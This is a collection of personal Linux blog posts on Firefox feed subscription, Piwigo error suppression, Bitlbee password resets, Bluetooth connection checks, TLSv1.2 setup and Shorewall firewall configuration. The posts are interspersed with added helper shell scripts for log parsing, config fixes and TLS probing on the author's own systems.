Adding “Subscribe” button to Firefox for quick and easy RSS Feed link creation. Configuring Akregator as a default Feed reader.

Hi there.

I like to use an RSS feed reader for stuff that I follow, for example YouTube channels, forum threads, blogs or even eBay searches. Sometimes (often) a website does not provide a subscription button. What to do? How to live? Well, there is a simple solution for Firefox users: add a “Subscribe” button to the toolbar. How?

1) Right click on the toolbar (somewhere on a free space between buttons) and choose “Customize“.

2) “Customize Toolbar” window will pop up.

3) Find the “Subscribe” button. Left click on it, hold, and drag the mouse pointer to the chosen place on the toolbar till You see a black line to the left of it. Release the left click.

4) Visit Your favorite YouTube channel or another page You would like to subscribe to (like a blog or a forum thread) and click the “Subscribe” button on the toolbar.

IF the button is “grayed out” it means that the website does not provide an RSS feed (shame on You, Twitter!) and in this case it’s a bummer… If however the button is “clickable” You are a few clicks away from Your personal happiness ;)… You can now either copy the link and use it in some terminal RSS feed reader, e.g. Newsbeuter, OR You can set it up with some GUI tool like Akregator.

Setting up with Akregator is easy.

1) Unfold the “Live Bookmarks” dropdown menu and click on “Choose Application”.

Configuring Akregator as a default Feed reader step 001

2) A file browser window will pop up. Navigate to /usr/bin/, find the akregator executable, click on it and then click Open.

Configuring Akregator as a default Feed reader step 002

3) Unfold the “Live Bookmarks” dropdown menu and click on “akregator”.

Configuring Akregator as a default Feed reader step 003

It is optional to tick the box “Always use akregator to subscribe to feed” – if You choose to do so, the next time You click the “Subscribe” button on the toolbar the link will be sent straight to Akregator.

4) Click “Subscribe Now”.

Configuring Akregator as a default Feed reader step 004

5) Akregator will inform You that a new feed was added. You can now go through the latest news from the channel that You chose to add.

Configuring Akregator as a default Feed reader step 005

That’s it. You are all done. “Subscribe” button is in place. Akregator is configured as a default RSS Feed reader.

Cheers.

Andrzej

P.S. You can use this method to customize toolbar with other buttons too. You can move, add and remove most of the toolbar elements. Mess around with it till You get what You want :).

[SOLVED] Piwigo: Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /var/www/html/images/admin/include/themes.class.php on line 697

Hi there.

Some time ago I noticed that Piwigo was throwing this error:

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /var/www/html/images/admin/include/themes.class.php on line 697

flooding the screen when I was logged in as administrator and messing with the Administration settings (and not only there). It caused absolutely nothing besides the flood of error messages. I searched for help and could not find anything. It was weird since I had error_reporting set to false in /etc/php/php.ini. Olgierd helped me by pointing out line 104 in the file common.inc.php (@ini_set('display_errors', true);) in the Piwigo installation folder.

In my case the file was located in the:

/var/www/html/images/include/common.inc.php

but general rule of thumb is:

./include/common.inc.php

inside Your Piwigo installation folder.

Use Your favorite text editor (as root) and change the line from:

@ini_set('display_errors', true);

to:

@ini_set('display_errors', false);

and then restart the httpd service.

A few days ago, after upgrading from Piwigo 2.6.0 to 2.6.1, the error was back and I had to search for the solution in my IM logs, which was a major PITA – hence this post. I suppose this will be something I will have to deal with after some (if not each) upgrade, but now that I have easy access to the solution and I know what needs to be done I see no problem with that.
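Since the edit has to be repeated after upgrades, here is a small script that does it and checks the result. This is an added example, not code from the post or from Piwigo; the path is the one from the post and GNU sed (as on Arch Linux) is assumed. Two things worth knowing while You are at it: display_errors=true on a production site prints absolute server paths (as the message above shows) to whoever triggers an error, so turning it off is the right call regardless of the flood, and the /e modifier itself was deprecated because it evaluates the replacement as PHP code and was removed entirely in PHP 7.0, so a Piwigo release that uses preg_replace_callback is the real fix.

```shell
#!/bin/sh
# Added example, not code from the post or from Piwigo: re-apply the
# display_errors fix after an upgrade and verify it, instead of editing
# include/common.inc.php by hand each time. The default path is the one
# from the post; override it with PIWIGO_COMMON=... for your install.

PIWIGO_COMMON=${PIWIGO_COMMON:-/var/www/html/images/include/common.inc.php}

# Return 0 if FILE still switches display_errors on, i.e. the state that
# floods the admin pages with Deprecated notices (and leaks server paths).
display_errors_is_on() {
    grep -Eq "ini_set\([[:space:]]*['\"]display_errors['\"][[:space:]]*,[[:space:]]*true" "$1"
}

# Flip the ini_set('display_errors', true) call in FILE to false.
# Other ini_set() calls are left alone. Prints the rewritten line.
# Assumes GNU sed (-i and -E), as shipped on Arch Linux.
set_display_errors_off() {
    file=$1
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 1; }
    sed -i -E \
        "s/(@?ini_set\([[:space:]]*['\"]display_errors['\"][[:space:]]*,[[:space:]]*)true([[:space:]]*\))/\1false\2/" \
        "$file"
    grep -E "ini_set\([[:space:]]*['\"]display_errors['\"][[:space:]]*,[[:space:]]*false" "$file"
}

# Typical use right after a Piwigo upgrade:
if [ -f "$PIWIGO_COMMON" ] && display_errors_is_on "$PIWIGO_COMMON"; then
    set_display_errors_off "$PIWIGO_COMMON" && echo "fixed $PIWIGO_COMMON"
fi
```

Run it as root (or as the user owning the Piwigo tree) after each upgrade; if the upgrade already shipped the line as false, it reports nothing and changes nothing.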

Thanks Olgierd.

Cheers.

Andrzej

Bitlbee 3.2.1 compiled against minimal installation of libpurple and patched so it retains gadu-gadu contacts upon Bitlbee server restart.

Hi.

The previous patch for Bitlbee stopped working, so I joined the Bitlbee IRC channel and asked for help. Dx picked up the challenge and wrote a new patch (in 15 minutes or so… Lawd, I wish I had a brain so I could hack the code like that…)

More to the story + some useful info can be found here.

Cheers.

Andrzej

P.S. If You want to encrypt Your Bitlbee traffic use Stunnel :).

System logs indicate that one of my local machines keeps poking my other machine from port 21817/udp. WTF?!

Hi folks.

I noticed weird entries in journalctl:

Jan 14 00:38:25 wishmasus.loc kernel: Shorewall:net2fw:DROP:IN=docketh1 OUT= MAC=00:xx:yy:xz:Zs:Ss SRC=OtherLocalMachine DST=MyMachine LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=24209 DF PROTO=UDP SPT=21817 DPT=37647 LEN=131

SPT=21817 is the source port the packet was sent from on the other machine; DPT=37647 is the port it tried to reach on mine.

I hate to see stuff like this, especially if I don’t know where it comes from, so I went to the machine that the traffic came from and ran (as root):

netstat -lnp | grep 21817

just to find out that…

tcp 0 0 0.0.0.0:21817 0.0.0.0:* LISTEN 664/skype
udp 0 0 0.0.0.0:21817 0.0.0.0:* 664/skype

somebody left Skype running…

Ports can vary…

tcp 0 0 0.0.0.0:37647 0.0.0.0:* LISTEN 1956/skype
udp 0 0 0.0.0.0:37647 0.0.0.0:* 1956/skype

and it does not have to be Skype… but if You have funny messages from shorewall in Your system journal, You can try to track down their source if You have access to the machine that sends them…
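To make that hunt less manual, here is an added example (not code from the post) that extracts the useful fields from Shorewall DROP lines, counts which source is hitting which port, and builds the socket lookup for the sending machine. It uses ss(8), which replaces the deprecated netstat; the log lines in it are constructed in the format shown above and the hosts, addresses and MACs are placeholders.

```shell
#!/bin/sh
# Added example, not code from the post: pull the useful fields out of
# Shorewall/netfilter DROP lines from the journal, summarise which
# source is hitting which port, and build the ss(8) query to run on the
# *sending* machine to find the process bound to that source port.
# The log lines below are constructed in the page's format; the hosts,
# addresses and MACs are placeholders.

LOG_SAMPLE='Jan 14 00:38:25 wishmasus.loc kernel: Shorewall:net2fw:DROP:IN=eth1 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.168.0.50 DST=192.168.0.100 LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=24209 DF PROTO=UDP SPT=21817 DPT=37647 LEN=131
Jan 14 00:38:31 wishmasus.loc kernel: Shorewall:net2fw:DROP:IN=eth1 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.168.0.50 DST=192.168.0.100 LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=24210 DF PROTO=UDP SPT=21817 DPT=37647 LEN=131
Jan 14 00:39:02 wishmasus.loc kernel: Shorewall:net2fw:DROP:IN=eth1 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.7 DST=192.168.0.100 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1 DF PROTO=TCP SPT=44321 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0'

# Reduce every DROP line on stdin to: chain proto src sport dst dport
parse_drops() {
    awk '
    /Shorewall:[^ ]*:DROP:/ {
        chain = $0
        sub(/.*Shorewall:/, "", chain); sub(/:DROP:.*/, "", chain)
        split("", kv)                       # clear the key=value map
        for (i = 1; i <= NF; i++) {
            n = index($i, "=")
            if (n > 1) kv[substr($i, 1, n - 1)] = substr($i, n + 1)
        }
        print chain, kv["PROTO"], kv["SRC"], kv["SPT"], kv["DST"], kv["DPT"]
    }'
}

# Count hits per (source, proto, destination port), busiest first.
top_talkers() {
    parse_drops | awk '{ print $3, $2, $6 }' | sort | uniq -c | sort -rn
}

# The command to run as root on the source host to see which process
# owns a port: -l listening, -n numeric, -p process, -u/-t protocol.
owner_cmd() {
    case "$1" in
        UDP) flag=u ;;
        TCP) flag=t ;;
        *)   echo "unknown protocol: $1" >&2; return 1 ;;
    esac
    printf 'ss -lnp%s "sport = :%s"\n' "$flag" "$2"
}

# Typical use on the firewall:  journalctl -k | top_talkers
printf '%s\n' "$LOG_SAMPLE" | top_talkers
```

On the sending machine, `owner_cmd UDP 21817` gives `ss -lnpu "sport = :21817"`, which in the case above would have printed the skype process straight away (ss needs root to show process names, just like netstat -p).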

Cheers.

Andrzej

Listing all / gathering information about currently connected bluetooth devices.

Hi there.

So I was working on my Arch Linux powered Asus V1S laptop this morning and I noticed that my bluetooth had 1 connected client device…

Connected Bluetooth Device Info

I was almost sure that it wasn’t one of my devices so I got curious / little worried.

How can You list all the current bluetooth connections? The answer is simple, although it took me a bit to figure it out:

hcitool con

It will list all the MAC addresses of the devices Your adapter is currently connected to / with:

Connections:
> ACL ZZ:AA:TT:PP:88:33 handle 42 state 1 lm MASTER

Now if You want to know more about any of those devices use this command:

hcitool info ZZ:AA:TT:PP:88:33

Just don’t forget to replace the MAC address ZZ:AA:TT:PP:88:33 with the MAC address of the connected device.

[andrzejl@wishmasus ~]$ hcitool info ZZ:AA:TT:PP:88:33
Requesting information …
BD Address: ZZ:AA:TT:PP:88:33
OUI Company: Nokia BLAH BLAH
Device Name: AndrzejL_Blah

MOAR BLAH
[andrzejl@wishmasus ~]$

Turns out it was one of my devices that was connected… 😉

The hcitool command can be used for many other things. To find out more read:

hcitool --help

and

man hcitool
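If You want this to be a check rather than a one-off look, here is an added example (not code from the post or from BlueZ) that parses the “hcitool con” output shown above, compares every connected address against a list of Your own devices and flags anything else. The sample output and the MAC addresses in it are constructed placeholders. Note that hcitool is deprecated in BlueZ 5; bluetoothctl “info <MAC>” gives the same device details if hcitool is gone from Your system.

```shell
#!/bin/sh
# Added example, not code from the post or from BlueZ: list the links
# the local adapter currently has, compare them against an allowlist of
# your own devices and flag anything else. Parses the "hcitool con"
# format shown on the page. The sample output and the MACs below are
# constructed placeholders; put your real devices in KNOWN_DEVICES.

KNOWN_DEVICES='ZZ:AA:TT:PP:88:33'   # one MAC per line

SAMPLE_CON='Connections:
    > ACL ZZ:AA:TT:PP:88:33 handle 42 state 1 lm MASTER
    < ACL 11:22:33:44:55:66 handle 43 state 1 lm SLAVE'

# Print the address from each ACL/SCO link line on stdin, upper-cased.
connected_macs() {
    awk '/(ACL|SCO)/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /^..:..:..:..:..:..$/) print toupper($i)
    }'
}

# Print "UNKNOWN <mac>" for every connected address not in the
# allowlist; return 1 if there was at least one.
unknown_connections() {
    found=0
    for mac in $(connected_macs); do
        if ! printf '%s\n' "$KNOWN_DEVICES" | grep -qix "$mac"; then
            echo "UNKNOWN $mac"
            found=1
        fi
    done
    return $found
}

# Live run, when hcitool is installed (needs the adapter to be up):
if command -v hcitool >/dev/null 2>&1; then
    hcitool con | unknown_connections && echo "all connections known"
fi
```

Cron it or run it by hand; the exit status is 1 whenever an address outside the allowlist is connected, so it is easy to hook a notification onto.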

Cheers.

Andrzej

‘HALP I locked meself out of bitlbee’ aka resetting Your bitlbee password.

Hi there.

Yes… I did it… 2 days ago I locked myself out of my own bitlbee account :). Easy fix if You have root on the machine that the bitlbee server runs on, though.

Get root:

su

Stop the bitlbee service. In Arch Linux that would be done with:

systemctl stop bitlbee

Move Yourself to where bitlbee stores the account xml files.

cd /var/lib/bitlbee

List the content of the folder and filter listing for xml files.

ls ./ | grep -i xml

You will get something like:

yourbitlbeelogin.xml

obviously instead of yourbitlbeelogin You will see Your actual login for Your bitlbee server.

Now generate new md5 hash for Your new password:

bitlbee -x hash yournewpassword

Replace yournewpassword with Your actual new password for the bitlbee server. The terminal will spit out something like:

7EcI4byy9MgrAPiK9

Write it down / copy it – whatever floats Your boat.

Use mcedit / nano / vi / emacs / joe – whatever suits You and open yourbitlbeelogin.xml.

mcedit ./yourbitlbeelogin.xml

The first line will look somewhat like this:

<user nick="yourbitlbeelogin" password="md5hashofyouroldbitlbeepassword" version="1">

Remove the md5hashofyouroldbitlbeepassword bit and replace it with the new md5 hash that You have just generated for yournewpassword, so it looks like this:

<user nick="yourbitlbeelogin" password="7EcI4byy9MgrAPiK9" version="1">

Save the file and restart Your bitlbee service.

systemctl start bitlbee

Use yournewpassword to log into the bitlbee server.

Because bitlbee uses Your password (or its hash – not sure) to encrypt the passwords of Your accounts (jabber / gadu-gadu / msn etc.), after manually editing that .xml file You won’t be able to log into any of those accounts – they will reject Your passwords as incorrect. You need to re-set all the account passwords. Use:

account <tag> set password <accountpassword>

on all Your accounts (luckily I only had 2), then disconnect and reconnect to the bitlbee server.

Tada… All is bitlbee with the world again.
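The same steps as a script, so the next lock-out takes one command instead of a hunt through the xml. This is an added example, not code from the post or from BitlBee; it assumes the Arch layout used above (/var/lib/bitlbee/<nick>.xml, a systemd unit called bitlbee) and that “bitlbee -x hash” prints the hash on its first line. The account passwords still have to be re-set afterwards, for the reason explained above.

```shell
#!/bin/sh
# Added example, not code from the post or from BitlBee: replace the
# password hash on the <user ...> line of a BitlBee storage file and
# bounce the daemon around the edit. Assumes /var/lib/bitlbee/<nick>.xml
# and a systemd unit named "bitlbee", as on the page; override
# BITLBEE_DIR if your install differs.

BITLBEE_DIR=${BITLBEE_DIR:-/var/lib/bitlbee}

# Read back the hash currently stored on the <user ...> line of FILE.
stored_hash() {
    sed -n -E '/<user /s/.*password="([^"]*)".*/\1/p' "$1"
}

# Replace the password="..." attribute on the <user ...> line of FILE
# with NEWHASH; account lines (which also carry password=) are left
# alone. A backup is kept as FILE.bak. Returns 1 if no <user line with a
# password attribute exists.
replace_user_hash() {
    file=$1; newhash=$2
    grep -q '<user [^>]*password="' "$file" || return 1
    # Escape the characters that are special in a sed replacement.
    esc=$(printf '%s' "$newhash" | sed -e 's/\\/\\\\/g' -e 's/[&/]/\\&/g')
    sed -i.bak -E "/<user /s/(password=\")[^\"]*(\")/\1${esc}\2/" "$file"
}

# Full procedure (run as root): stop bitlbee, rewrite the hash, start it.
reset_bitlbee_password() {
    nick=$1; newpass=$2
    file="$BITLBEE_DIR/$nick.xml"
    [ -f "$file" ] || { echo "no storage file for $nick" >&2; return 1; }
    hash=$(bitlbee -x hash "$newpass" | head -n1)
    [ -n "$hash" ] || { echo "bitlbee -x hash produced nothing" >&2; return 1; }
    systemctl stop bitlbee
    replace_user_hash "$file" "$hash"
    rc=$?
    systemctl start bitlbee
    return $rc
}

# Usage:  reset_bitlbee_password yourbitlbeelogin 'yournewpassword'
```

Keep the .bak around until You have logged in again; if the login still fails, restore it and You are no worse off than before.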

Cheers.

Andrzej

Qualys SSL Labs Test results for AndrzejL.no-ip.org and Firefox TLSv1.2 fix.

Hi there.

I was motivated by a new colleague to enable Forward Secrecy on the WoTW WWW server. I did it. I also tested the website on the Qualys SSL Labs website. Here are the results.

Qualys SSL Labs test results

As You can see I got quite high scores. I failed only because the SSL certificate was not trusted. I cannot get another certificate for the no-ip domain simply because I do not own the no-ip domain, only a subdomain. Plus, in the times of Snowden’s revelations, who really trusts Certificate Authorities when governments can force any CA to give up their master keys or to create a valid certificate so they can snoop on SSL connections to “test” something… Also, I decided (some time ago) to disable all protocols but TLSv1.2. The SSL Labs test results say that this site will fail with many clients / browsers because of that… To this I say: update / fix Your browsers, people. I don’t care for browsers that cannot work with the latest / greatest crypto. I don’t have to be compatible with older browsers. I would prefer to force people to use the latest / most secure protocols / browsers that work with them than to allow compatibility between older browsers and my server by lowering the crypto standards of my server.

Unfortunately I noticed that Firefox had a problem with TLSv1.2 and since it’s my browser of choice I investigated it. Here is a fix:

a) open the browser
b) paste this into the address bar:

about:config?filter=security.tls.version.max

c) find the variable

security.tls.version.max

d) double click on it
e) change its default value to:

3

f) close and re-open the browser

There – fixed. Mozilla finally got their act together: upgrade Your browser to version 27 (or newer) and TLSv1.2 is enabled by default, so the about:config change is not needed any more. There… now Your Firefox can work with the latest TLS version…

For those that want to know more, here is the link. For those that will be complaining about compatibility with older websites I say this – IF the server does not provide TLSv1.2 then why bother providing https at all? Those servers are outdated and/or badly configured. Neither of these is good for security.
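You do not need the SSL Labs page to verify the server side of this; openssl s_client can ask for each protocol version in turn and tell You which ones the server accepts and whether the negotiated cipher is an ephemeral (forward secret) one. The script below is an added example, not code from the post; the host and port in the usage line are placeholders and the protocol flags are those of openssl s_client.

```shell
#!/bin/sh
# Added example, not code from the post: probe which TLS versions a
# server accepts and whether the cipher it picks gives forward secrecy,
# using openssl s_client. The host/port in the usage line are
# assumptions; the flags (-ssl3 -tls1 -tls1_1 -tls1_2) are s_client's
# own (-ssl3 is absent from builds compiled without SSLv3).

# Decide from s_client output whether a session was negotiated. A
# successful handshake prints a real cipher on the "Cipher :" line; a
# refused version prints "0000" or "(NONE)" there, or no such line.
handshake_ok() {
    printf '%s\n' "$1" | awk '
        /^ *Cipher *:/ { c = $NF }           # last field is the cipher name
        END { exit !(c != "" && c != "0000" && c != "(NONE)") }'
}

# True if the negotiated cipher uses ephemeral (EC)DH, i.e. a recorded
# session cannot be decrypted later with the server's private key.
forward_secret() {
    printf '%s\n' "$1" | awk '
        /^ *Cipher *:/ { c = $NF }
        END { exit !(c ~ /^(ECDHE|DHE)-/) }'
}

# Try one version; prints "host:port version accepted|rejected [fs]".
probe_version() {
    host=$1; port=$2; ver=$3
    out=$(printf 'Q\n' | openssl s_client -connect "$host:$port" \
              -servername "$host" "-$ver" 2>&1)
    if handshake_ok "$out"; then
        fs=""; forward_secret "$out" && fs=" fs"
        echo "$host:$port $ver accepted$fs"
    else
        echo "$host:$port $ver rejected"
    fi
}

# Probe every version; the goal from the post is only tls1_2 accepted.
probe_all() {
    for v in ssl3 tls1 tls1_1 tls1_2; do probe_version "$1" "$2" "$v"; done
}

# Usage:  probe_all andrzejl.no-ip.org 443
```

A server configured as described in the post prints three “rejected” lines and one “tls1_2 accepted fs”; an “accepted” without “fs” means the cipher list still prefers plain RSA key exchange.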

And another thing… Bank of Ireland had weaker scores than my site and provides no Forward Secrecy…

Bank Of Ireland Qualys SSL Labs Test Results

Of course they got A grade. Their cert is valid.

Cheers.

Andrzej

Configuring shorewall for LAN ipv4 connection.

Hi folks.

What is shorewall? Well, this is not Wikipedia so I won’t go into the details. Suffice to say it’s a firewall. I must underline here that I am in no way an expert on the security subject, neither am I a firewall expert. I am posting this info for my own use, as those settings have served me well (unlike my memory) in the past and I would like to re-use them in the future without struggling to remember – but if You want to use them (and maybe later improve them to suit Your needs) then go ahead – feel free to do so, just be aware that I am taking no responsibility whatsoever for the security of Your machine and the consequences of it getting hacked. I hereby confirm that this config is what I use at home and that it’s safe and secure to the best of my knowledge.

Here it goes:

1) First install shorewall:

su

Enter root’s password, then:

pacman -S shorewall

resolving dependencies…
looking for inter-conflicts…

Packages (1): shorewall-4.5.19-1

Total Installed Size: 2.23 MiB

:: Proceed with installation? [Y/n] y
(1/1) checking keys in keyring [###############################################] 100%
(1/1) checking package integrity [###############################################] 100%
(1/1) loading package files [###############################################] 100%
(1/1) checking for file conflicts [###############################################] 100%
(1/1) checking available disk space [###############################################] 100%
(1/1) installing shorewall [###############################################] 100%

2) Enable shorewall at boot time.

systemctl enable shorewall

You should see this as output:

ln -s '/usr/lib/systemd/system/shorewall.service' '/etc/systemd/system/multi-user.target.wants/shorewall.service'

3) Find out what network interfaces You have:

ip link

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT qlen 1000
link/ether 00:1e:52:7a:46:5d brd ff:ff:ff:ff:ff:ff
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT qlen 1000
link/ether 00:0a:e4:f6:d4:8f brd ff:ff:ff:ff:ff:ff

4) Check which ports are open on the machine before shorewall gets configured and started (optional) by scanning it from another machine with nmap. wishmacer uses the IP 192.168.0.100 and I am scanning it from another local machine, icsserver, which uses 192.168.0.1:

date && nmap -p 0-65535 192.168.0.100 && date

Hint: You will be able to see the ETA if You press space during the scan.

Sat Aug 10 17:04:03 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:04 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.46% done; ETC: 17:41 (0:00:21 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
7634/tcp open hddtemp
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
Sat Aug 10 17:04:20 IST 2013

It took 16.5 seconds roughly to scan all the 65536 ports and it discovered 2 open tcp ports 7634 and 50505.

5) Configure shorewall accordingly:

To configure shorewall You will use Your favorite text editor (vi, mcedit, nano etc., whatever suits You) as root. Config files are stored in the folder:

/etc/shorewall

A) /etc/shorewall/shorewall.conf

Find these three settings:

STARTUP_ENABLED=No

AUTOMAKE=No

BLACKLIST="NEW,INVALID,UNTRACKED"

and change the two "No" values to "Yes" and the BLACKLIST value to ALL, so they look like this:

STARTUP_ENABLED=Yes

AUTOMAKE=Yes

BLACKLIST=ALL

Now check whether Your shorewall.conf contains this entry (if You have the latest shorewall from the Arch Linux repository and You have merged Your .pacnew file, it will):

WORKAROUNDS=Yes

and if it does, change it to:

WORKAROUNDS=No

Why? The workarounds exist for distributions that ship older kernels / iptables (Debian stable or CentOS, for example). A current Arch Linux does not need them.

B) /etc/shorewall/zones

Add these 2 lines at the end of the file:

net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Zones File
#
# For information about this file, type "man shorewall-zones"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-zones.html
#
##################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

C) /etc/shorewall/interfaces

Here You will use the info gathered in point 3. So in my case the network interfaces are eth0 and wlan0 – the wireless network is not used at the moment (but we will define it anyway) and the interface eth0 is connected to my router.

Add these 3 lines at the end of the file:

net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Interfaces File
#
# For information about entries in this file, type "man shorewall-interfaces"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-interfaces.html
#
##################################
FORMAT 2
##################################
#ZONE INTERFACE OPTIONS
net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

D) /etc/shorewall/policy

Add these 4 lines to the end of the file:

fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Policy File
#
# For information about entries in this file, type "man shorewall-policy"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-policy.html
#
##################################
#SOURCE DEST POLICY LOG LIMIT: CONNLIMIT:
# LEVEL BURST MASK
fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

The "info" in the LOG LEVEL column makes every packet dropped by these policies show up in the journal as a Shorewall:net2fw:DROP: line (the kind of entry discussed in the Skype post above). Leave that column empty if You do not want the logging.

6) Start shorewall:

systemctl start shorewall

7) Check its status:

journalctl -xn

-- Logs begin at Fri 2013-08-09 23:23:46 IST, end at Sat 2013-08-10 17:01:44 IST. --
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.
-- Subject: Unit shorewall.service has finished start-up
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

-- Unit shorewall.service has finished starting up.

-- The start-up result is done.

systemctl status shorewall

shorewall.service – Shorewall IPv4 firewall
Loaded: loaded (/usr/lib/systemd/system/shorewall.service; enabled)
Active: active (exited) since Sat 2013-08-10 17:01:44 IST; 2min 57s ago
Process: 2069 ExecStart=/usr/bin/shorewall $OPTIONS start (code=exited, status=0/SUCCESS)

Aug 10 17:01:42 wishmacer.loc systemd[1]: Starting Shorewall IPv4 firewall…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Compiling…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Setting locale failed.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Please check that your locale settings:
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANGUAGE = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LC_ALL = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANG = "en_UK.UTF-8"
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: are supported and installed on your system.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Falling back to the standard locale ("C").
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/params …
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/shorewall.conf…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Loading Modules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/interfaces…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Determining Hosts in Zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Locating Action Files…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/policy…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /etc/shorewall/initdone…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Kernel Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 1…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/rules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/conntrack…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 2…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Applying Policies…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Drop for chain Drop…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Broadcast for chain Broadcast…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Generating Rule Matrix…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Reject for chain Reject…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Creating iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Shorewall configuration compiled to /var/lib/shorewall/.start
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Starting Shorewall….
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Initializing…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/init …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/tcclear …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
